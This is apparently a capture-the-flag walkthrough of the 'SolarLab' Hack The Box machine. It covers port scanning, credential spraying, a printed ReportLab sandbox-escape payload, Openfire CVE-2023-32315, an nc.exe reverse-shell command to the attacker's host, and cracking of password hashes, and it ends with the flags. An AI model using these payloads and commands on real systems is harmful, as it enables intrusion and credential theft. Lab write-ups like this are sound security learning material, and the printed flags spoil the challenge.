Nmap Results
# Nmap 7.94SVN scan initiated Mon May 13 13:06:00 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.215.232
Nmap scan report for 10.129.215.232
Host is up (0.045s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
7680/tcp open pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-13T17:07:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 13 13:08:29 2024 -- 1 IP address (1 host up) scanned in 149.48 seconds
In the output for tcp/80
and tcp/6791
, we can see a redirect to solarlab.htb
and report.solarlab.htb
respectively. Let's get those hostnames added to our /etc/hosts
file.
echo '10.129.215.232 solarlab.htb report.solarlab.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/139,445
SMB Null Session Share Access
We almost certainly won't be able to map the ADMIN$
and C$
anonymously, but the Documents
share looks interesting.
SMB Null Session Enumeration
blake
and openfire
are two local users on the targetCompile Information
I'm going to take the usernames (including the username portions of emails) and passwords found in this document and from RID cycling and put them into separate files, as we'll want to try spraying them at services.
Usernames
alexander.knight
KAlexander
blake.byte
AlexanderK
ClaudiaS
claudia.springer
blake
openfire
Passwords
al;ksdhfewoiuh
dkjafblkjadsfgl
d398sadsknr390
ThisCanB3typedeasily1@
danenacia9234n
dadsfawe9dafkn
TCP/80
gobuster
enumeration didn't reveal anything interesting when using dir
and vhost
mode. Time to look at some other ports.TCP/6791
Manual Login Testing
gobuster
scans at it, even when tuning down the thread count. So, I'll just try some manual logins using the details-file.xlsx
entries first, since there are only six entries.Password Spraying with Hydra
nano valid-users.txt
We note the server responds User authentication error.
when a login is invalid and the login payload looks like username=test&password=test
. This login payload is sent in a HTTP POST
request.
gobuster dir
scans well, so I have to assume we just don't have the right username.{firstname}{l}
, in other words, John Doe == JohnD
. So, let's review our usernames.txt
file for any names we can update to this naming convention.If alexander.knight
becomes AlexanderK
and claudia.springer
becomes ClaudiaS
, then we should add a BlakeB
to the list for blake.byte
. Let's see what that does for our efforts.
echo 'BlakeB' >> valid-users.txt
Log in and Explore the App
ReportLab PDF Library
, which is something we should research further.Testing RCE
poc.txt
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('ping -n 2 10.10.14.35') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>
It will be best use Burp to catch the request and send it to Repeater to substitute with our payload in various points for testing.
Right-click the request in Burp and choose Send to Repeater. I tried injecting my payload in the user_input
field, but it seems the 300
character limit is validated server side.
I then tried injecting the payload into the travel_request
field and this worked, as it does not have a character limit that is checked by the server.
Exploit
Understanding the Exploit
The library has known in 2019 a similar exploit leading to remote code execution via the Color attribute of the HTML tags, the content of the attribute was directly evaluated as a python expression usingeval
function thus leading to code execution. To mitigate the issue Reportlab has implemented a sandbox calling itrl_safe_eval
that is stripped from all python builtins functions and has multiple overridden builtin functions to permit the execution of the library safe code while stopping any access to dangerous functions and libraries that can subsequently lead to construction of dangerous python code
One of the many overridden builtin classes is called type
, if this class is called with one argument, it returns the type of an object. however in case it is called with three arguments, it returns a new type object. This is essentially a dynamic form of the class statement. In other words it can allow the creation of a new class that inherits from another class.
Therefore, the gist of this exploit is that we can create a custom class satisfies three conditions to bypass safety checks:
Always returnFalse
for calls to functionstartswith
to bypass(name.startswith('__')
Should returnFalse
to its first call to__eq__
to bypass thename in __rl_unsafe__
, after the first call it should return the correct response because when__eq__
is called by the python builtingetattr
it should return the correct result.
the hash should be he same of the hash of its underlying string
This custom class then sources in the os
class in the __globals__
scope and allows overwriting of the custom functions put in place as a mitigation.
Reverse Shell
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: SOLARLAB
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00330-80112-18556-AA133
Original Install Date: 11/16/2023, 9:37:33 PM
System Boot Time: 5/14/2024, 12:58:41 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,814 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,437 MB
Virtual Memory: In Use: 1,362 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.231.39
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
============== ==============================================
solarlab\blake S-1-5-21-3606151065-2641007806-2768514320-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Users and Groups
Local Users
User accounts for \\SOLARLAB
-------------------------------------------------------------------------------
Administrator blake DefaultAccount
Guest openfire WDAGUtilityAccount
The command completed successfully.
Local Groups
Aliases for \\SOLARLAB
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users
The command completed successfully.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.231.39
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Open Ports
TCP 127.0.0.1:5000 0.0.0.0:0 LISTENING 2260
TCP 127.0.0.1:5222 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5223 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5262 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5263 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5269 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5270 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5275 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5276 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:7070 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:7443 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2512
Processes and Services
Interesting Processes
Name : openfire-service.exe
Owner :
CommandLine :
Name : timeout.exe
Owner : SOLARLAB\blake
CommandLine : timeout /t 600 /nobreak
Name : python3.11.exe
Owner : SOLARLAB\blake
CommandLine : "C:\Users\blake\AppData\Local\Microsoft\WindowsApps\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\py
thon.exe" "C:\Users\blake\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\Loca
lCache\local-packages\Python311\Scripts\waitress-serve.exe" --listen 127.0.0.1:5000 --threads 10 app:app
Scheduled Tasks
Interesting Scheduled Tasks
TaskName : Start Internal App
User : blake
Action : C:\Users\blake\Documents\start-app.bat
Interesting Files
C:\Users\blake\Documents\app\instance\users.db
SQLite format 3@ .jD
o!!I?+,9tableuseruserCREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(50) NOT NULL,
password VARCHAR(100) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username)
)';indexsqlite_autoindex_user_1user
�_A�!)alexanderkHotP!fireguard'claudias007poiuytrewq 9blakebThisCanB3typedeasily1@
UU��!alexanderk
claudias blakeb
SQLite version 3.45.1 2024-01-30 16:01:20
Enter ".help" for usage hints.
sqlite> .tables
user
sqlite> select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
Privilege Escalation
Port Forwarding with Chisel
I'll be using the download_chisel
function from my notes here to download the latest copy of the chisel
binaries to the current directory
-sT
(full TCP connect) scans through a SOCKS proxy. As such, the scan will take a bit longer than your typical scan. Be patient!chisel-nmap.txt
# Nmap 7.94SVN scan initiated Thu May 16 15:23:53 2024 as: nmap -Pn -p9091,9090,7443,7070,5276,5275,5270,5269,5263,5262,5223,5222,5000 -T5 -sC -sV -sT -oN chisel-nmap.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| Connection: close
| Content-Length: 2045
| Content-Type: text/html; charset=utf-8
| Date: Thu, 16 May 2024 19:24:07 GMT
| Server: waitress
| Vary: Cookie
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Login - ReportHub</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f5f5f5;
| margin: 0;
| padding: 0;
| display: flex;
| flex-direction: column;
| align-items: center;
| height: 100vh;
| .logo {
| max-width: 200px;
| margin-bottom: 20px;
| display: block;
| margin: 0 auto;
| text-align: center;
| color: #333;
| form {
| max-w
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Connection: close
| Content-Length: 63
| Content-Type: text/plain; charset=utf-8
| Date: Thu, 16 May 2024 19:24:13 GMT
| Server: waitress
| Request
| Start line is invalid
|_ (generated by waitress)
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| invalid-namespace
| (timeout)
| stream_id: 6cxq1mit31
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
5223/tcp open ssl/jabber
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| unknown:
| capabilities:
| auth_mechanisms:
| xmpp:
| errors:
| (timeout)
|_ compression_methods:
5262/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| invalid-namespace
| (timeout)
| stream_id: afhv556np4
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| unknown:
| capabilities:
| auth_mechanisms:
| xmpp:
| errors:
| (timeout)
|_ compression_methods:
|_ssl-date: TLS randomness does not represent time
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| host-unknown
| (timeout)
| stream_id: 201oqw75h4
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
|_ssl-date: TLS randomness does not represent time
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| invalid-namespace
| (timeout)
| stream_id: 5vi18bdiq0
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
5276/tcp open ssl/jabber
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| unknown:
| capabilities:
| auth_mechanisms:
| xmpp:
| errors:
| (timeout)
|_ compression_methods:
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:03 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:18 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:10 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:20 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:03 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:46 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:25:10 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:25:15 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
Burp through the SOCKS5 Proxy
Openfire Admin Console
CVE-2023-32315
Run this command on the target to run nc.exe
over SMB and connect to the TCP listener.
cmd.exe /c \\10.10.14.186\evil\nc.exe 10.10.14.186 443 -e powershell.exe
Lateral to openfire Service Account
The OFUSER
table is created with 12 columns:
USERNAME
STOREDKEY
SERVERKEY
SALT
ITERATIONS
PLAINPASSWORD
ENCRYPTEDPASSWORD
NAME
EMAIL
CREATIONDATE
MODIFICATIONDATE
CONSTRAINT
The most interesting column here is PLAINPASSWORD
, which is the sixth column.
Here, we can see the sixth column is NULL
. However, we still have the user's encrypted password in column seven — becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442
. Let's do some more research on how we might crack this.
Cracking the Administrator's Hash
blowfish
encryption for this to work. This can be found at C:\Program Files\openfire\conf\security.xml
where $enc_password - encrypted password from table [ofUser] column [encryptedPassword], $blowfish_key - blowfish key table [ofProperty] column [propValue] where [name]='passwordKey'
We also need the passwordKey
string from the database, which should be simple enough.
Modifying the Exploit
Escalate to Administrator
Flags
User
cdd58d6118f4523f2ffd145e54875780
Root
3b0960ad0eed7f91650c5a73e74eb828